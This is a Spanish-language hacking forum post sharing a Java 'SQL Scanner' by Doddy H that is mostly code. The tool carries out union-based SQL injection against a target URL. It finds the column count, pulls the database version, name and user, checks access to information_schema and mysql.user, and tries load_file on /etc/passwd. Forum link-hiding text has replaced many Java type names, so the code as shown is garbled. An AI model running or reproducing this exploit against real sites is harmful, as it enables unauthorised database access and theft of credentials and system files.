comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[Java] SQL Scanner 0.1

  • 0 Respuestas
  • 1308 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado BigBear

  • *
  • Underc0der
  • Mensajes: 543
  • Actividad:
    0%
  • Reputación 3
    • Ver Perfil
« en: Enero 12, 2013, 11:44:27 pm »
Un simple Scanner SQLI hecho en Java.

Código: Java
  1. //SQL Scanner 0.1
  2. //Coded By Doddy H
  3.  
  4. import java.util.Scanner;
  5. import java.io.*;
  6. import java.net.*;
  7.  
  8. import java.util.regex.Matcher;
  9. import java.util.regex.Pattern;
  10.  
  11. public class Main {
  12.  
  13.     public static void main(No tienes permisos para ver links. Registrate o Entra con tu cuenta[] args) throws No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  14.  
  15.  
  16.         No tienes permisos para ver links. Registrate o Entra con tu cuenta codex;
  17.         No tienes permisos para ver links. Registrate o Entra con tu cuenta target;
  18.  
  19.         Pattern uno = null;
  20.         Matcher dos = null;
  21.  
  22.         Scanner host = new Scanner(No tienes permisos para ver links. Registrate o Entra con tu cuenta.in);
  23.         No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("\n\n-- == SQL Scanner 0.1 == --\n\n");
  24.         No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] Page : ");
  25.         target = host.nextLine();
  26.  
  27.         No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("\n[+] Checking ...\n");
  28.  
  29.         codex = toma(target + "-1+union+select+666--");
  30.  
  31.         uno = Pattern.compile("The used SELECT statements have a different number of columns");
  32.         dos = uno.matcher(codex);
  33.  
  34.         if (dos.find()) {
  35.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] Scanning ...\n");
  36.  
  37.             int x;
  38.             No tienes permisos para ver links. Registrate o Entra con tu cuenta urlfinal;
  39.             No tienes permisos para ver links. Registrate o Entra con tu cuenta otrofinal;
  40.             No tienes permisos para ver links. Registrate o Entra con tu cuenta code;
  41.             No tienes permisos para ver links. Registrate o Entra con tu cuenta formariny;
  42.             No tienes permisos para ver links. Registrate o Entra con tu cuenta otroformar;
  43.             No tienes permisos para ver links. Registrate o Entra con tu cuenta link;
  44.  
  45.             urlfinal = "";
  46.             formariny = "";
  47.  
  48.             for (x = 1; x <= 5; x = x + 1) {
  49.  
  50. //urlfinal = urlfinal+x+",";
  51.                 urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ",";
  52.                 formariny = formariny + x + ",";
  53.  
  54.                 otrofinal = urlfinal;
  55.                 otroformar = formariny;
  56.  
  57.                 otrofinal = otrofinal.substring(0, otrofinal.length() - 1);
  58.                 otroformar = otroformar.substring(0, otroformar.length() - 1);
  59.  
  60.                 code = toma(target + "-1+union+select+" + otrofinal);
  61.  
  62.                 uno = Pattern.compile("RATSXPDOWN(\\d+)");
  63.                 dos = uno.matcher(code);
  64.  
  65.                 if (dos.find()) {
  66.  
  67.                     otroformar = otroformar.replace(dos.group(1), "hackman");
  68.  
  69.                     link = target + "-1+union+select+" + otroformar;
  70.  
  71.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[Target] : " + link);
  72.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[Limit] : The site has " + x + " columns");
  73.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[Data] : The number " + dos.group(1) + " print data");
  74.  
  75.                     savefile("logs-scansql.txt", "[Target] : " + link);
  76.                     savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns");
  77.                     savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data");
  78.  
  79.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("\n[+] Searching informaion ...\n");
  80.  
  81.                     details(link);
  82.  
  83.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("\n[+] Finished");
  84.  
  85.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("\n-- == Coded By Doddy H == --");
  86.  
  87.                     savefile("logs-scansql.txt", "\n-----------------\n");
  88.  
  89.                     No tienes permisos para ver links. Registrate o Entra con tu cuenta.exit(1);
  90.  
  91.                 }
  92.  
  93.             }
  94.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] Error");
  95.         } else {
  96.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] Not vulnerable");
  97.         }
  98.  
  99.     }
  100.  
  101.     private static void details(No tienes permisos para ver links. Registrate o Entra con tu cuenta urla) throws No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  102.  
  103.         No tienes permisos para ver links. Registrate o Entra con tu cuenta concat;
  104.         No tienes permisos para ver links. Registrate o Entra con tu cuenta code;
  105.  
  106.         Pattern uno = null;
  107.         Matcher dos = null;
  108.  
  109.         concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))";
  110.  
  111.         urla = urla.replace("hackman", concat);
  112.  
  113.         code = toma(urla);
  114.  
  115.         uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854");
  116.         dos = uno.matcher(code);
  117.  
  118.         if (dos.find()) {
  119.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] DB Version : " + dos.group(1));
  120.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] DB Name : " + dos.group(2));
  121.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] Username : " + dos.group(3));
  122.  
  123.             savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1));
  124.             savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2));
  125.             savefile("logs-scansql.txt", "[+] Username : " + dos.group(3));
  126.  
  127.         } else {
  128.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] Not found any data");
  129.         }
  130.  
  131.         urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)");
  132.  
  133.         code = toma(urla + "+from+information_schema.tables--");
  134.         uno = Pattern.compile("ERTOR854");
  135.         dos = uno.matcher(code);
  136.  
  137.         if (dos.find()) {
  138.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] information_schema : on");
  139.             savefile("logs-scansql.txt", "[+] information_schema : on");
  140.         } else {
  141.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] information_schema : off");
  142.         }
  143.  
  144.         code = toma(urla + "+from+mysql.user--");
  145.         uno = Pattern.compile("ERTOR854");
  146.         dos = uno.matcher(code);
  147.  
  148.         if (dos.find()) {
  149.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[+] mysqluser : on");
  150.             savefile("logs-scansql.txt", "[+] mysqluser : on");
  151.         } else {
  152.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] mysquser : off");
  153.         }
  154.  
  155.         urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))");
  156.  
  157. //ystem.out.print(urla);
  158.  
  159.         code = toma(urla);
  160.         uno = Pattern.compile("ERTOR854");
  161.         dos = uno.matcher(code);
  162.  
  163.         if (dos.find()) {
  164.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] load_file : on");
  165.             savefile("logs-scansql.txt", "[-] load_file : on");
  166.         } else {
  167.             No tienes permisos para ver links. Registrate o Entra con tu cuenta.out.println("[-] load_file : off");
  168.         }
  169.  
  170.     }
  171.  
  172.     private static void savefile(No tienes permisos para ver links. Registrate o Entra con tu cuenta nombre, No tienes permisos para ver links. Registrate o Entra con tu cuenta texto) throws No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  173.  
  174.         No tienes permisos para ver links. Registrate o Entra con tu cuenta writer = new No tienes permisos para ver links. Registrate o Entra con tu cuenta(nombre, true);
  175.         writer.write(texto + "\r\n");
  176.         writer.close();
  177.  
  178.     }
  179.  
  180.     private static No tienes permisos para ver links. Registrate o Entra con tu cuenta toma(No tienes permisos para ver links. Registrate o Entra con tu cuenta urla) throws No tienes permisos para ver links. Registrate o Entra con tu cuenta {
  181.  
  182.         No tienes permisos para ver links. Registrate o Entra con tu cuenta re;
  183.  
  184.         No tienes permisos para ver links. Registrate o Entra con tu cuenta conte = new No tienes permisos para ver links. Registrate o Entra con tu cuenta(40);
  185.  
  186.         No tienes permisos para ver links. Registrate o Entra con tu cuenta url = new No tienes permisos para ver links. Registrate o Entra con tu cuenta(urla);
  187.         No tienes permisos para ver links. Registrate o Entra con tu cuenta hc = url.openConnection();
  188.         hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
  189.  
  190.         No tienes permisos para ver links. Registrate o Entra con tu cuenta nave = new No tienes permisos para ver links. Registrate o Entra con tu cuenta(
  191.                 new No tienes permisos para ver links. Registrate o Entra con tu cuenta(hc.getInputStream()));
  192.  
  193.         while ((re = nave.readLine()) != null) {
  194.             conte.append(re);
  195.         }
  196.  
  197.         nave.close();
  198.  
  199.         return conte.toString();
  200.  
  201.     }
  202.  
  203.     public static No tienes permisos para ver links. Registrate o Entra con tu cuenta encodehex(No tienes permisos para ver links. Registrate o Entra con tu cuenta text) {
  204.  
  205. //Thanks to Katarina Majetic
  206. //Based on http://www.dzone.com/snippets/encode-string-hex
  207.  
  208.         byte[] z = text.getBytes();
  209.         No tienes permisos para ver links. Registrate o Entra con tu cuenta h = new No tienes permisos para ver links. Registrate o Entra con tu cuenta();
  210.         No tienes permisos para ver links. Registrate o Entra con tu cuenta l;
  211.         int n;
  212.         int a = z.length;
  213.         int u;
  214.  
  215.         for (n = 0; n < a; n++) {
  216.             u = z[n] & 0x000000FF;
  217.             l = No tienes permisos para ver links. Registrate o Entra con tu cuenta.toHexString(u);
  218.             h.append(l);
  219.         }
  220.         return "0x" + h.toString();
  221.     }
  222. }
  223.  
  224. //The End ?
  225.  

 

¿Te gustó el post? COMPARTILO!



[Video Curso] Iniciacion a Java por DesarrolloWeb y EscuelaIT Mayo 2014

Iniciado por graphixx

Respuestas: 3
Vistas: 1591
Último mensaje Febrero 23, 2015, 10:13:28 am
por Hu3c0
Como compilar programas Java en la consola de comandos de Windows

Iniciado por tar3kw0rm3d

Respuestas: 2
Vistas: 2279
Último mensaje Junio 04, 2013, 02:55:07 pm
por tar3kw0rm3d
[LIBRO] Programación avanzada en Java - Sonia Jaramillo Valbuena

Iniciado por graphixx

Respuestas: 3
Vistas: 3009
Último mensaje Julio 25, 2018, 10:33:06 am
por GVelandia
Java Extremo [Video Cursos Completos] [Español] [ISO] 2009

Iniciado por graphixx

Respuestas: 9
Vistas: 4588
Último mensaje Diciembre 04, 2017, 02:36:34 am
por graphixx
Sobreescritura y SobreCarga de Métodos en Java ( Overriding y Overloading )

Iniciado por Expermicid

Respuestas: 0
Vistas: 1259
Último mensaje Noviembre 02, 2014, 05:02:04 pm
por Expermicid